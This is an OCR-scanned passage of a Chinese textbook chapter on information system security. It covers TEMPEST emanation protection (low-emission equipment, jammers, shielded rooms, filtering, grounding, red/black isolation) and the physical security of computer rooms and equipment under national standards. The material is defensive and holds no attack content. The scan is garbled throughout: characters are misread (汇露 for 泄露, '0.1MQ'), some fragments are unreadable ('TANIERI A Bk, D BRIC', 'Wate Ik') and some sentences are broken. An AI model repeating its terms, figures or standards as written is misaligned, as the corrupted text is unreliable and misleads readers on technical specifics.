则 重新 设计 ， 制 造 出 全 新 的 产品 。 通 过 实施 “ 红 黑 ”隔离 ， 滤 波及 屏蔽 等 基本 措施 ， 使 
整 机 达到 TEMPEST 标准 。 这 时 仍 须 采 用 金属 屏蔽 机 箱 ， 但 重量 要 轻 得 多 ， 外 形 与 一 般 
商用 机 几乎 无 差别 ， 同 时 价格 也 下 降 不 少 。 按 照 国 家 保密 标准 ， 低 泄 射 产品 按 其 电磁 泄 
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露 发 射 指标 分 为 A 级 、B 级 和 C 级 三 级 , 其 中 A 级 产品 的 电磁 泄露 发 射 相对 最 大 ，C 级 
的 最 小 。 低 泄 射 产品 分 级 是 为 了 在 选择 防护 设备 时 配合 不 同 级 别 的 安全 距离 ， 达 到 合 
防护 。 

安全 距离 是 指 信 息 设备 至 可 控 边 界 的 距离 ， 按 远近 也 分 为 A、B、C 三 级 。 安 全 距 
离 和 低 泄 射 设备 配合 使 用 ， 比 如 ，A 级 安全 距离 相对 最 远 ， 安 全 性 最 高 ， 则 选取 相应 的 
A 级 低 泄 射 产品 ， 以 避免 欠 防 护 和 过 防护 。 低 泄 射 产品 的 防护 程度 高 ， 主 要 用 于 高 密级 、 
信息 设备 使 用 比较 分 散 的 场合 。 

2. 电磁 干扰 器 

干扰 器 是 一 种 能 辐射 出 电磁 噪声 的 电子 仪器 。 它 是 通过 增加 电磁 噪声 降低 辐射 泄露 
信息 的 总 体 信 品 比 ， 增 大 辐射 信息 被 截获 后 破解 还 原 的 难度 ， 从 而 达到 “掩盖 ”真实 信 
息 的 目的 。 其 防护 的 可 靠 性 也 相对 较 差 ， 因 为 设备 辐射 出 的 信息 量 并 未 减少 。 从 原理 上 
讲 ， 运 用 合适 的 信息 处 理 手段 ， 仍 有 可 能 还 原 出 有 用 信息 ， 只 是 还 原 的 难度 相对 增 大 。 
这 是 一 种 成 本 相对 低廉 的 防护 手段 ， 主 要 用 于 保护 密级 较 低 的 信息 。 

电磁 干扰 器 作为 一 种 TEMPEST 产品 ， 它 的 发 射 方向 与 方向 参数 有 严格 限制 。 根 据 
国家 保密 标准 ， 干 扰 器 可 以 分 为 两 级 。 一 级 用 来 保护 处 理 机 密级 〈 含 机 密级 ) 以 下 信息 
的 计算 机 。 另 一 级 用 来 保护 处 理 秘密 级 信息 的 计算 机 和 最 小 警戒 距离 较 远 的 处 理 秘密 级 
信息 的 计算 机 。 此 外 ， 使 用 干扰 器 还 会 增加 周围 环境 的 电磁 污染 ， 对 其 他 电磁 兼容 性 较 
差 的 电子 信息 设备 的 正常 工作 构成 一 定 的 威胁 。 所 以 在 没有 其 他 有 效 防护 手段 的 前 提 下 ， 
只 能 作为 应 急 措施 才 使 用 干扰 器 。 

3. 处理 涉 密 信息 的 电磁 屏蔽 室 的 技术 

所 谓 屏蔽 ， 就 是 用 屏蔽 材料 将 泄露 源 包 封 起 来 。 屏 项 既 可 防止 屏蔽 体内 的 泄露 源 产 
生 的 电磁 波 泄露 到 外 部 空间 去 ， 又 可 以 使 外 来 电磁 波 终 止 于 屏蔽 体 ， 还 可 以 防止 声 光 泄 
露 。 因 此 ， 屏 蔽 既 达 到 了 防止 信息 外 泄 的 目的 ， 同 时 又 兼 具 了 防止 外 来 强 电磁 辐射 ， 如 
电子 战 中 的 “电磁 炸弹 ”对 设备 硬 杀 伤 的 作用 。 屏 蔽 是 抑制 辐射 汇 露 最 有 效 的 手段 ， 但 
建立 屏蔽 室 的 造价 较 高 ， 只 适合 对 自动 化 系统 中 高 密级 重点 设备 。 

TEMPEST 屏蔽 室 单 纯 使 用 屏蔽 法 ， 结 合 滤波 的 手段 其 中 屏蔽 室 的 门 屏蔽 性 能 抗 老 
ama TEMPEST 屏蔽 室 中 安装 符合 有 关 指 标的 电源 滤波 器 、 信 号 线 滤 波 器 、 波 导 

电费 及 连接 器 等 部 件 。 按 照 国 家 保密 标准 ， 屏 蔽 室 根据 相关 传导 抑制 要 求 和 电磁 场 
TANIERI A Bk, D BRIC 级 三 级 。 其 中 A 级 的 屏 太 效果 相对 最 差 ,C 级 的 最 好 。 
屏蔽 室 分 级 也 是 为 了 配合 安全 距离 ， 达 到 合理 防护 。 建 造 电磁 屏蔽 室 的 措施 防护 的 程度 
很 高 ， 主 要 用 于 高 密级 、 信 息 设 备 使 用 较 集中 的 部 位 。 

4. 其 他 的 防 泄露 技术 

滤波 是 抑制 传导 泄露 的 主要 方法 之 一 。 电 源 线 或 信号 线 上 加 装 合适 的 滤波 器 可 以 阻 
断 传导 泄露 的 通路 ， 从 而 大 大 抑制 传导 泄露 。 

接地 和 搭 接 也 是 抑制 传导 泄露 的 有 效 方法 。 良 好 的 接地 和 搭 接 ， 可 以 给 杂 散 电磁 能 
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量 一 个 通 向 大 地 的 低 阻 回路 ， 从 而 在 一 定 程度 上 分 流 掉 可 能 经 电源 线 和 信和 号 线 传输 出 去 
的 杂 散 电磁 能 量 。 将 这 一 方法 和 屏蔽 、 滤 波 等 技术 配合 使 用 ， 对 抑制 电子 设备 的 电磁 汇 
露 可 起 到 事半功倍 的 效果 。 

隔离 和 合理 布局 均 为 降低 电磁 泄露 的 有 效 手段 。 隔 离 是 将 信息 系统 中 需要 重点 防护 
的 设备 从 系统 中 分 离 出 来 , 加 以 特别 防护 , 并 切断 其 与 系统 中 其 他 设备 间 电 磁 汇 圳 通路 。 
合理 布局 是 指 以 减少 电磁 泄露 为 原则 合理 地 放置 信息 系统 中 的 有 关 设 备 。 合 理 布局 也 包 
括 尽量 拉 大 涉 密 设备 与 非 安 全 区 域 ( 公 共 场 所 ) 的 距离 。 

选用 低 汇 露 设备 也 是 降低 电磁 泄露 的 有 效 手 段 之 一 ， 目 前 可 选用 的 低 泄露 分 完全 包 
容 型 和 红 黑 隔离 型 两 种 。 其 中 红 黑 隔离 是 TEMPEST 技术 中 特有 的 ， 是 TEMPEST 技术 
的 核心 概念 之 一 。“ 红 ” 指 有 信息 泄露 的 危险 ,“ 黑 ” 则 表示 安全 “ 红 ” 包 括 红 区 、 红 线 ， 
通常 将 设备 中 处 理 未 经 加 密 的 机 密 信息 的 区 域 称 为 “ 红 区 ”, 而 未 经 加 密 的 机 密 信息 的 传 
输 线 则 称 为 “红线 “ 红 ”与 “ 黑 ” 需 严格 隔离 ， 防 止 红 信号 的 耦合 泄露 。TEMPEST 
防护 的 实质 就 是 通过 降低 红 发 射 信号 达到 保护 机 密 信息 的 目的 。 

配置 低 辐射 设备 。 这 种 设备 是 在 设计 和 生产 计算 机 设备 时 ， 就 已 对 可 能 产生 电磁 辐 
射 的 元 器 件 、 集 成 电路 、 连 接线 、 显 示 器 等 采取 了 防 辐射 措施 ， 把 电磁 辐射 抑制 到 最 低 
限度 。 在 自动 化 系统 的 核心 使 用 低 辐 射 计算 机 设备 是 防止 计算 机 电磁 辐射 泄密 的 较为 根 
本 的 防护 措施 。 它 和 屏蔽 手段 结合 使 用 可 以 有 效 地 保护 绝密 级 信息 。 

举例 来 说 ， 我 们 对 系统 中 一 台 计 算 机 就 可 以 采用 以 上 措施 中 的 几 种 进行 综合 防护 。 
在 有 条 件 的 情况 下 可 以 采用 低 辐 射 的 液晶 显示 器 来 代 蔡 高 辐射 的 CRT 显示 器 。 如果 现 有 
条 件 不 允许 ,可 以 对 其 采用 以 下 一 些 措施 进行 防护 。 首先 CRT 显像管 锥 体 玻璃 克 和 屏幕 
有 很 强 的 电磁 能 量 向 外 辐射 ， 且 对 地 磁场 也 极为 敏感 。 对 于 锥 体 玻璃 这， 用 一 个 坡 葛 合 
金 材 料 做 的 屏蔽 单 全 部 单 住 。 对 子 显示 屏 ， 装 配 电磁 屏蔽 玻璃 ， 并 且 要 求 玻璃 中 间 的 金 
属 丝 与 显示 器 机 箱 体 的 接触 电阻 不 大 于 0.1MQ。 其 次 行 输出 管 及 其 电流 输出 线 是 一 个 强 
干扰 源 和 泄露 源 。 为 此 在 行 输出 管 管 脚 套 上 磁 珠 ， 对 行 输出 线 采 用 屏蔽 双 绞 线 ， 且 套 上 
磁 环 。 对 于 行 输 出 变压器 设计 了 屏蔽 时。 对 显示 器 机 这 采用 铝 合 金 铸造 机 箱 ， 并 在 箱 体 
外 层 喷 涂 一 层 非 结晶 态 高 导 磁 率 粉 末 。 在 盖 板 与 机 箱 接触 处 嵌入 导电 橡胶 条 和 屏蔽 带 。 
最 后 对 显示 终端 的 电源 线 、 键 盘 线 和 通信 电缆 可 采用 屏蔽 双 绞 线 。 对 不 同 的 互 连 线 ， 用 
不 同性 能 和 不 同型 号 的 线 。 对 互 连 线 的 连接 器 可 采用 带 有 屏蔽 结构 并 含 滤波 器 的 连接 器 。 
对 于 显示 卡 上 的 晶体 振荡 器 可 加 屏蔽 。 

TEMPEST 技术 标准 是 进行 涉 密 信息 系统 认证 的 基础 ， 是 建立 涉 密 信息 系统 测评 体 
系 的 前 提 。 它 的 制定 比 其 他 标准 更 为 严格 ， 可 以 具体 指导 防护 工作 。 由 于 TEMPEST 技 
术 的 特殊 性 ， 国 外 对 其 TEMPEST 技术 标准 严格 保密 。 我 国 近 十 年 来 投入 大 量 人 力 物 力 
对 其 进行 了 探索 和 研究 ， 制 定 了 自主 的 技术 标准 。 该 系列 标准 对 各 种 防护 手段 都 有 指导 
意义 。 因 为 重点 单位 的 计算 机 系统 是 一 个 很 复杂 的 信息 处 理 系统 。 它 所 涉及 到 的 信息 密 
级 存在 着 很 大 差别 。 要 评估 各 种 信息 的 密级 ， 确 立信 息 的 涉 密 等 级 ， 还 要 掌握 最 小 的 警 
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戒 距 离 ， 考 虑 空间 对 电磁 泄露 的 衰减 问题 。 另 外 还 要 评估 系统 中 各 种 密码 设备 的 使 用 要 
求 与 电磁 发 射 泄露 安全 性 。 

只 有 在 系列 标准 的 指导 下 ， 进 行 各 种 防护 手段 的 综合 运用 ; 综合 考虑 各 种 设备 的 择 
放 、 布 局 ， 考 虑 声 、 光 、 电 的 信息 泄露 ， 按 照 信息 的 密级 和 最 小 警戒 距离 等 因素 混合 
用 各 种 防护 手段 ， 才 能 达到 最 佳 的 防护 效果 。 


4.1.4 物理 安全 


物理 安全 是 保护 计算 机 网 络 设备 、 设 施 以 及 其 他 媒体 免 遭 地 震 、 水 灾 、 火 灾 等 环境 
事故 (如 电磁 污染 等 ) 及 人 为 操作 失误 或 错误 及 各 种 计算 机 犯罪 行为 导致 的 破坏 。 物 理 
安全 是 整个 计算 机 信息 系统 安全 的 前 提 。 为 了 获得 完全 的 保护 ， 物 理 安全 措施 是 计算 系 
统 中 必需 的 。 

物理 安全 主要 包括 三 个 方面 : 

CL) 场地 安全 (环境 安全 ): 是 指 系 统 所 在 环境 的 安全 ， 主 要 是 场地 与 机 房 ， 参 见 
国家 标准 GB50173-1993 (电子 计算 机 机 房 设 计 规 范 )、GB2887-89〔 计 算 站 场地 技术 条 
件 )。GB9361-1988 (计算 站 场地 安全 要 求 )。 

(2) 设备 安全 : 主要 指 设备 的 防盗 、 防 毁 、 防 电磁 信息 辐射 泄露 、 防 止 线路 截获 、 
抗 电磁 干扰 及 电源 保护 等 。 参 见 GB4943-1995〔 信 息 技术 设备 (包括 电气 事务 设备 ) 的 
安全 IEC950)、GB9254-1988 信息 技 求 设备 的 无 线 电 干 扰 极 限 值 和 测量 方法 )。 

(3) 媒体 安全 : 包括 媒体 的 数据 的 安全 及 媒体 本 身 的 安全 。 

414.1 场地 安全 

为 了 有 效 合理 地 对 计算 机 机 房 进行 保护 ， 应 对 计算 机 机 房 划分 出 不 同 的 安全 等 级 ， 
相应 地 提供 不 同 的 安全 保护 措施 ， 根 据 GB9361 一 1988， 计 算 机 机 房 的 安全 等 级 分 为 A 
类 、B 类 、C 类 三 个 基本 类 别 。 

A 级 机 房 : 对 计算 机 机 房 的 安全 有 严格 的 要 求 ， 有 完善 的 计算 机 计算 机 安全 措施 ， 
具有 最 高 的 安全 性 和 可 靠 性 。 

B 级 机 房 : 对 计算 机 机 房 的 安全 有 严格 的 要 求 , 有 较 完善 的 计算 机 计算 机 安全 措施 ， 
安全 性 和 可 靠 性 介 于 A、C 级 之 间 。 

C 级 机 房 : 对 计算 机 机 房 的 安全 有 基本 的 要 求 ， 有 基本 的 计算 机 计算 机 安全 措施 ， 
C 级 机 房 具有 最 低 限 度 的 安全 性 和 可 靠 性 。 

在 实际 的 应 用 中 ， 可 根据 使 用 的 具体 情况 进行 机 房 等 级 的 设置 ， 同 一 机 房 也 可 以 对 
不 同 的 设备 〈 如 电源 、 主 机 ) 设置 不 同 的 级 别 。 

为 了 保证 计算 机 中 心 有 效 地 开展 信息 处 理工 作 ， 基 本 工作 房间 和 维修 室 、 仪 器 室 、 
备品 室 、 磁 介质 存放 室 、 人 员工 作 室 等 房间 所 占 面积 的 总 和 应 不 小 于 计算 机 机 房 面积 的 
1.5 倍 ， 面 且 还 应 考虑 到 计算 机 信息 系统 设备 的 扩充 。 通 常 计算 机 机 房 的 面积 还 应 留 有 
15% 一 30% 的 富裕 空间 。 
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机 房 的 安全 可 以 从 以 下 几 个 方面 来 考虑 。 

(1) 供 配 电 系统 : 信息 系统 的 供 配 电 系统 要 求 能 保证 对 机 房 内 的 主机 、 服 务 器 、 网 
络 设 备 、 通信 设备 等 的 电源 供应 在 任何 情况 下 都 不 会 间断 , 做 到 无 单 点 失效 和 平稳 可 靠 ， 
这 就 要 求 两 路 以 上 的 市 电 供应 ， 有 元 余 的 自 备 发 电机 系统 ， 还 有 能 保证 足够 时 间 供 电 系 
统 等 。 

(2) 防 雷 接地 系统 :为 了 保证 信息 系统 机 房 的 各 种 设备 安全 ， 要 求 机 房 设 有 四 种 接 
地 形式 ， 即 计算 机 专用 直流 逻辑 地 、 配 电 系 统 交流 工作 地 、 安 全 保护 地 、 防 雷 保护 地 。 

(3) 消防 报警 及 自动 灭火 系统 功能 , 在 信息 系统 设备 的 放置 地 为 实现 火灾 自动 灭火 ， 
应 该 设计 火灾 自动 监测 及 报警 系统 ， 以 便 能 自动 监测 火灾 的 发 生 ， 并 能 启动 自动 灭火 系 
统 和 报警 系统 。 

(4) 门禁 系统 : 对 于 大 型 信息 系统 ， 安 全 易 用 的 门禁 系统 可 以 保证 信息 系统 的 物理 
安全 ， 同 时 也 可 以 提高 管理 的 效率 ， 其 中 需要 注意 的 原则 是 安全 可 靠 、 简 单 易 用 、 分 级 
制度 、 中 央 控 制 和 多 种 识别 方式 的 结合 。 

(5) 保安 监控 系统 : 信息 系统 的 保安 监控 包括 几 个 系统 的 监控 ， 如 闭路 监视 系统 、 
通道 报 管 系统 和 人 工 监控 系统 等 。 

引起 场地 安全 的 自然 原因 的 威胁 有 如 下 几 种 : 

(1) 场地 温度 对 计算 机 设备 所 使 用 电子 元 器 件 ， 绝 缘 材 料 ， 金 属 构件 以 及 记录 介质 
等 都 将 产生 一 定 的 影响 。 

@ 对 元 器 件 的 影响 。 在 计算 机 设备 中 ， 使 用 了 大 批 的 半导体 器 件 、 电 阻 器 、 电 容 
器 等 。 在 计算 机 加 电工 作 时 ， 环 境 温度 的 升 高 会 对 它们 的 正常 工作 造成 影响 。 当 温度 过 
高 时 ， 可 能 会 使 某 些 元 、 器 件 不 能 正常 工作 甚至 完全 失去 作用 ， 从 而 导致 计算 机 设备 的 
故障 。 

@ 对 绝缘 材料 和 金属 的 影响 。 绝 缘 材 料 也 称 电介质 ， 是 重要 的 电气 绝缘 材料 。 通 
常 都 希望 这 些 材料 的 电阻 越 高 越 好 ， 面 高 温 会 引起 电介质 的 热 破坏 ， 使 电介质 的 绝缘 强 
度 降低 ; 另外 ， 在 计算 机 设备 中 ， 所 有 的 机 械 传 动 部 分 ， 各 类 开关 等 一 般 由 金属 构成 。 
在 高 温 下 工作 ， 由 于 其 膨胀 系数 不 同 ， 可 能 发 生 所 谓 “ 卡 死 ” 现 象 ， 影 响 设备 的 正常 工 
作 ， 而 且 还 缩短 使 用 寿命 。 同 样 ， 低 温和 剧烈 的 温度 变化 的 变化 和 机 械 损伤 。 

@ 对 记录 介质 的 影响 。 对 绝缘 材料 、 金 属 构 件 也 会 产生 不 良 影响 ， 主 要 包括 磁带 、 
磁盘 、 打 印 纸 和 光盘 等 。 这 些 介质 在 长 期 存放 和 使 用 中 ， 若 环境 温度 过 高 或 过 低 ， 可 能 
会 出 现 数据 丢失 或 无 法 存 取 的 故障 。 对 于 磁 介 质 来 说 ， 随 着 温度 的 升 高 ， 开 始 磁 导 率 升 
高 ， 但 当 温度 升 高 到 某 一 位 置 时 ， 磁 介质 将 失去 磁性 ， 磁 导 率 急剧 下 降 ， 导 致 磁 介 质 的 
损坏 。 磁 介质 失去 磁性 的 温度 称 为 居 里 温度 ， 显 然 ， 磁 介质 应 在 低 于 甚至 远 低 于 居 里 温 
度 的 范围 内 。 纸 介质 在 温度 超过 176'C 时 开始 碳化 ， 不 能 继续 使 用 。 

由 此 可 见 ， 温 度 对 计算 机 设备 产生 的 影响 是 很 大 的 ， 因 此 必须 保证 计算 机 机 房 的 开 
机 和 停机 时 的 温度 在 规定 的 范围 之 内 。 
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(2) 场地 湿度 对 计算 机 信息 系统 的 影响 。 

空气 的 湿度 与 温度 有 关 。 在 绝对 湿度 不 变 的 情况 下 ， 相 对 湿度 随 温度 上 升 而 降低 ， 
随 温度 下 降 而 上 升 。 在 相对 温度 保持 不 变 的 情况 下 ， 温 度 越 高 ， 水 蒸气 压力 增 大 ， 水 蒸 
气 对 计算 机 设备 的 影响 越 大 。 随 着 压力 增 大 ， 水 蒸气 在 元 器 件 或 在 介质 材料 表 而 形成 的 
水 膜 越 来 越 厚 ， 造 成 短路 和 出 现 飞 弧 现 象 ， 引 起 设备 故障 。 

另外 ， 磁 带 机 、 磁 盘 驱 动 器 、 光 盘 驱 动 器 等 外 部 设备 也 受 湿度 的 影响 ， 高 湿度 将 影 
响 磁头 的 高 速 运转 以 及 使 磁带 打滑 。 湿 度 太 高 ， 还 会 导致 磁性 材料 的 磁 导 率 明 显 变 化 ， 
增 大 损耗 。 打 印 纸 等 纸 介质 ， 在 高 湿 状 态 下 也 会 因 吸收 水 分 而 变 软 ， 导 致 强度 降低 ， 易 
于 破损 影响 正常 使 用 。 

高 湿度 对 计算 机 的 危害 是 明显 的 , 而 低 湿度 的 危害 有 时 更 加 严重 。 在 相同 的 条 件 下 ， 
相对 湿度 越 低 ， 也 就 是 说 越 干燥 ， 静 电 电压 越 高 ， 影 响 计 算 机 设备 的 正常 工作 。 实 验 表 
明 ， 当 计算 机 机 房 的 相对 湿度 为 30% 时 ,静电 电压 为 5000V， 当 相对 湿度 为 20% 时 ， 融 
电 电压 就 到 了 10000V， 而 相对 湿度 降 到 5% 时 ， 则 静电 电压 可 高 达 20000V。 

静电 对 计算 机 的 主要 危害 是 由 于 静电 噪声 对 电子 线路 的 干扰 ， 引 起 电位 的 瞬时 改 
变 ， 导 致 存储 器 中 的 信息 丢失 或 误 码 。 静 电 不 仅 会 使 计算 机 设备 的 运转 出 故障 ， 而 且 还 
会 影响 操作 人 员 的 身心 健康 ， 给 操作 人 员 带 来 心理 上 的 极 大 不 安 ， 降 低 工作 效率 。 

为 了 克服 高 温 、 潮 湿 、 低 温 、 干 燥 等 给 计算 机 设备 带 来 的 危害 ， 通 常 希望 把 计算 机 
机 房 的 湿度 控制 在 45% 一 65% 之 间 。 

ie :对 计算 机 信息 系统 安全 的 影响 。 

灰尘 对 计算 机 设备 ， 特 别 是 在 精密 机 械 设备 和 接 插 元 件 的 影响 较 大 。 不 论 计算 机 房 
采用 何 种 结构 形式 ， 由 于 下 述 原因 ， 机 房 内 存在 着 大 量 灰尘 仍 是 不 可 避免 的 。 

。 由 于 空气 调节 需要 不 断 地 补充 新 风 ， 通 过 空调 系统 把 大 气 中 的 灰尘 带 进 了 计算 机 

房 。 

。 机 房 工作 人 员 出 入 机 房 带 入 的 灰尘 。 

。 机 房 的 墙壁 、 地 面 、 天 棚 等 起 尘 或 涂 层 脱落 形成 的 灰尘 。 

。 机 房 建筑 不 严密 ， 通 过 缝隙 渗 透 进入 机 房 的 灰尘 。 

。 计算 机 的 外 部 设备 ， 如 打印 机 等 在 运转 过 程 中 产生 的 侍 导 

在 计算 机 的 各 种 设备 中 ， 最 怕 灰 尘 的 是 磁盘 存储 器 和 光盘 驱动 器 ， 除 此 之 外 ， 在 其 
他 方面 也 存在 着 明显 的 危害 ， 如 获 盖 在 集成 电路 及 其 他 电子 元 件 表面 的 灰尘 ， 将 妨碍 电 
子 元 器 件 的 散热 ， 使 其 散热 能 力 降低 。 

大 量 含 导电 性 尘埃 的 灰尘 落 入 计算 机 设备 内 ， 就 会 使 有 关 材料 或 设备 的 绝缘 性 能 
低 甚至 短路 。 相 反 ,， 大 量 的 绝缘 性 尘埃 落 入 设备 时 ， 则 可 能 引起 接 择 件 触 点 间接 触 不 良 。 
此 外 ， 人 尘埃 落 进 接 插件 、 磁 盘 机 及 其 他 外 部 设备 的 接触 部 分 或 传动 部 分 ， 将 会 使 磨 探 阻 
i A een 甚至 发 生 卡 死 现象 。 

于 尘埃 落 入 计算 机 信息 系统 中 是 不 可 避免 的 ， 因 此 ， 应 当 定期 用 清洁 剂 或 采取 其 


第 4 章 信息 系统 安全 基础 


他 措施 来 减少 灰尘 的 危害 。 

(4) 有 害 气体 对 计算 机 信息 系统 安全 的 影响 

大 气 中 含有 的 各 种 盐 、 酸 及 冶炼 、 化 工 等 工业 生产 中 排出 的 有 害 气 体 ， 对 电子 计算 
机 设备 具有 很 大 腐蚀 作用 。 通 常 把 含有 这 些 有 害 物 的 气体 称 为 有 害 气 体 或 腐蚀 气体 。 

对 计算 机 设备 有 影响 的 腐蚀 性 气体 很 多 ， 其 中 影响 较 大 的 有 二 氧化 硫 、 硫 化 氧 、 二 
氧化 氮 、 一 氧化 碳 和 臭氧 等 。 这 些 有 害 气体 在 空气 中 发 生化 学 变化 ， 会 对 计算 机 及 外 设 
的 接 插 件 、 开 关 、 继 电器 、 绝 缘 材 料 制品 和 其 他 方面 以 及 人 体 产生 破坏 作用 和 不 良 影响 。 
存在 大 量 腐蚀 性 气体 的 空气 是 一 种 特殊 的 环境 ， 而 且 计算 机 机 房 内 的 诸 设备 又 不 产生 这 
些 有 害 气体 ， 所 以 到 目前 为 止 ， 还 难以 对 计算 机 机 房 内 腐蚀 气体 的 允许 含量 给 出 定量 的 
数据 ， 通 常 都 是 以 不 危害 计算 机 操作 人 员 的 身体 健康 为 标准 。 有 具体 的 指标 参照 国家 有 关 
的 有 害 气体 对 人 体 影 响 的 标准 和 规定 。 

(5) 对 于 机 房 的 抗震 ， 需 进行 如 下 的 安排 。 

大 多 数 地 震 对 计算 机 设施 造成 的 损失 是 房屋 倒塌 和 设备 损坏 ， 为 此 ，A、B 级 安全 
机 房 的 建筑 物 采 用 较 厚 的 钢筋 混凝土 加 强 结构 ， 应 具有 抗 地 震 能 力 ;， 机 房 的 电源 和 空洞 
等 设备 应 具有 耐 地 震 的 性 能 ， 机 房 计算 机 构 和 设备 要 固定 牢靠 ， 装 在 地 震 区 域 的 计算 机 
应 确保 所 有 的 设备 机 构 全 部 装 上 地 板 安全 闭锁 装置 ， 除 此 之 外 ， 还 要 有 人 身 安全 的 避难 
措施 。 

此 外 ， 引 起 场地 安全 的 还 有 人 为 原因 ， 其 主要 威胁 有 如 下 几 种 ; 

(1) 火灾 是 计算 机 房 比较 普遍 的 、 危 害 较 大 的 灾害 之 一 。 火 灾 的 原因 主要 有 : 电线 
破损 、 电 气 、 抽 烟 失误 、 蓄 意 放火 、 接 线 错误 、 外 部 火 情 草 延 到 机 房 内 ， 以 及 技术 上 或 
管理 上 的 原因 等 。 

为 了 避免 火灾 的 发 生 或 在 发 生火 灾 时 使 损失 降 到 最 小 程度 ， 通 常 应 采取 以 下 的 防火 
措施 ;机房 的 构件 ， 如 墙壁 、 地 板 、 屋 项 、 隔 断 、 吸 热 、 消 音 材 料 都 应 采用 难 燃 或 不 燃 
材料 。C 级 安全 机 房 和 已 经 记录 媒体 存放 间 ， 其 建筑 物 的 耐火 等 级 应 符合 (建筑 设计 防 
火 规 范 )。 

为 了 确保 防火 ， 应 加 强 防火 管理 ， 建 立 必要 的 消防 机 构 ， 并 经 常 对 机 房 人 员 进 行 消 
防 教育 和 训练 ， 制 定 有 效 的 防火 措施 。 

机 房 内 应 不 放 或 少 放 易 燃 物品 ， 如 打印 纸 之 类 可 放置 少 些 ， 但 只 保持 满足 近期 使 用 
数量 ， 多 余 的 备份 放 入 贮藏 室 。 电 源 及 导线 会 引起 机 房 电 气 着 火 ， 因 此 防火 程序 一 定 要 
注意 包括 电源 保护 装置 。 所 有 介质 材料 和 文件 及 操作 手册 ， 应 放置 在 保险 箱 里 。 对 于 灭 
火 装置 和 报警 系统 要 进行 维护 保养 。 

(2) 对 于 机 房 的 防水 ， 需 进行 如 下 的 安排 。 

机 房 内 不 得 铺设 水 管 和 蒸汽 管道 。 若 非 铺设 不 可 ， 则 必须 采取 防 渗 漏 措施 ， 机 房 墙 
壁 、 天 花 板 、 地 面 应 有 防水 、 防 潮 性 能 ;， 通 有 水 管 的 地 方 应 设置 止 水 阀 和 排水 沟 ; 不 要 
把 机 房 设置 在 楼 房 底层 或 地 下 室 ， 以 防水 侵蚀 或 受潮 ;如 有 通 往 机 房 的 电费 沟 ， 要 防止 
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下 十 时 电线 沟 进 水 漫 到 机 房 。 

(3) 电源 直接 影响 计算 机 的 可 靠 运转 。 

影响 电源 可 靠 性 的 因素 有 : 电压 瞬 变 、 瞬 时 停电 和 电压 等 。 为 了 确保 计算 机 不 间断 
运行 ,对 A、B 级 安全 机 房 应 做 到 以 下 几 点 

。 应 设 专用 供电 线路 ， 供 电 电源 指标 应 符合 GB2887 一 82 中 第 九条 的 规定 

。 计算 机 供电 电源 设备 提供 稳定 、 可 靠 的 电源 ; 
供电 电源 设备 的 容量 具有 足够 的 富余 量 ; 
可 根据 需要 选用 一 定 维持 时 间 的 UPS 电源 ， 以 对 付 瞬 变 、 噪 声 、 电 压 显著 下 降 停 
电 。UPS 电源 可 以 在 没有 外 电 输 入 的 情况 下 支持 其 负载 长 达 45 一 60min 。 
如 果 电 源 中 断 时 间 超 过 UPS 蓄电池 的 供电 时 间 , 而 计算 机 又 不 许 停止 工作 时 , 应 
考虑 安装 柴油 发 电机 或 叶轮 发 电机 。 

(4) 防 物 理 、 化 学 和 生物 灾害 ， 主 要 是 指 电子 设备 的 辐射 等 引起 的 安全 问题 ， 此 外 
还 有 昆虫 、 鼠 类 等 引起 的 安全 隐患 。 
4142 ”设备 安全 

设备 安全 包括 设备 的 防 资 和 防 毁 ， 防 止 电磁 信息 泄露 ， 防 止 线 路 截获 、 抗 电磁 干扰 
一 级 电源 的 保护 。 其 主要 内 容 包 括 : 

1. 设备 防盗 。 

可 以 使 用 一 定 的 防盗 手段 (如 移动 报警 器 、 数 字 探 测报 警 和 部 件 上 锁 ) 保护 计算 机 
系统 设备 和 部 件 ， 以 提高 计算 机 信息 系统 设备 和 部 件 的 安全 性 。 

2. 设备 防 毁 

一 是 对 抗 自然 力 的 破坏 ， 如 使 用 接地 保护 等 措施 保护 计算 机 信息 系统 设备 和 部 件 。 
二 是 对 抗 人 为 的 破坏 ， 如 使 用 防 砸 外 壳 等 措施 。 

3. 防止 电磁 信息 泄露 

为 防止 计算 机 信息 系统 中 的 电磁 信息 泄露 ， 提 高 系统 内 敏感 信息 的 安全 性 ， 通 常 使 
用 防止 电磁 信息 泄露 的 各 种 涂料 、 材 料 和 设备 等 。 包 括 3 个 方面 : 防止 电磁 信息 的 泄露 
(如 屏蔽 室 等 防止 电磁 辐射 引起 的 信息 泄露 )， 和 干扰 泄露 的 电磁 信息 〈 如 利用 电磁 干扰 对 
泄露 的 电磁 信息 进行 扰乱 ); 吸收 泄露 的 电磁 信息 (如 通过 特殊 材料 涂料 等 吸收 泄露 的 电 
Wate Ik). 

4. 防止 线路 截获 

主要 防止 对 计算 机 信息 系统 通信 线路 的 截获 与 干扰 。 重 要 技术 可 归纳 为 4 个 方面 : 
预防 线路 截获 〈 使 线路 截获 设备 无 法 正常 工作 ); 扫描 线路 截获 (发 现 线路 截获 并 报警 ); 
定位 线路 截获 (发 现 线 路 截获 设备 工作 的 位 置 ); 对 抗 线路 截获 (阻止 线路 截获 设备 的 有 
效 使 用 )。 

5. 抗 电磁 干扰 

防止 对 计算 机 信息 系统 的 电磁 和 干扰， 从 而 保护 系统 内 部 的 信息 。 包 括 两 个 方面 : 对 


第 4 章 信息 系统 安全 基础 


抗 外 界 对 系统 的 电磁 干扰 和 消除 来 自 系 统 内 部 的 电磁 干扰 。 

工业 电气 设备 产生 的 干扰 ， 是 计算 机 电磁 干扰 的 主要 来 源 ， 这 种 干扰 源 按 其 干扰 性 
质 可 分 为 : 工 频 干扰 、 开 关 干 扰 、 放 电 干 扰 和 射频 干扰 。 

(1) 工 频 干扰 

工业 频率 的 电流 互感 器 、 整 流 器 、 高 压 输 电线 、 交 流 稳 压 器 中 的 交流 电 ， 不 仅 会 产 
生 交 流 噪 声 ， 还 会 因 所 含 高 频 谐 波 分 量 产生 噪声 干扰 。 电 源 中 的 高 频 瞬 态 电压 、 浪 涌 电 
压 、 大 电流 冲击 ， 可 统称 为 “电源 噪声 ”。 当 市 电 电 压 忽 高 忽 低 、 频 繁 开 关机 器 或 将 大 负 
载 接 入 一 个 系统 时 ， 都 会 在 电源 线 及 其 供电 设备 上 产生 一 个 电源 噪声 。 市 电 电压 经 常 在 
170~250V 之 间 波 动 . 特别 是 上 、 下 班 时 电网 负荷 变动 很 大 ， 而 且 是 突 发 性 过 渡 过 程 ， 
会 产生 很 强 的 干扰 脉冲 。 另外, 来自 别 的 噪声 源 的 噪声 ， 也 可 以 沿 着 电源 线 进入 计算 机 。 
